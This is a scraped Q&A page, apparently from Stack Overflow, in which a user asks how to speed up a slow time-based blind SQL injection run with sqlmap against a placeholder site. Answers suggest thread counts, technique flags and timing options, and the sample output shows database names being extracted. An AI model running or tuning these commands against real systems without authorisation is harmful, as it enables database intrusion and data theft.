•  19-06-2021
  •  | 
  •  

Question

Here's an example. Just trying to list the databases:

python sqlmap.py -u "http://somesite.com/?id=1" --dbs

[15:20:32] [INFO] fetching database names
[15:20:32] [INFO] fetching number of databases
[15:20:32] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[15:20:39] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
2
[15:20:55] [INFO] adjusting time delay to 2 seconds due to good response times
2
[15:20:58] [INFO] retrieved: 100_MYDB
[15:22:39] [INFO] retrieved: DEV_GC_DATASTORAGE
[15:26:15] [INFO] retrieved: GC_

You can see in the timestamps it takes about 3 minutes to list 1 database name, it goes character by character, each character takes ~7 seconds. The tutorials I've seen on youtube are superfast... What can I do to speed this up? I've tried messing with .conf

Thanks.

Was it helpful?

Solution 2

What is the network latency to somesite.com? You can check this by simply doing ping somesite.com. If the latency is high, doing blind SQL injection will be slow as you test char by char. – rgerganov Jul 4 at 19:43

OTHER TIPS

You can also use the -o switch for some optimizations. Also try --technique=BEUS

Use more threads. Default is 1:

       --threads=THREADS
          Max number of concurrent HTTP(s) requests (default 1)

you can use like this for response fast. sqlmap -u "http://somesite.com/?id=1" --time-sec 15

Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow
scroll top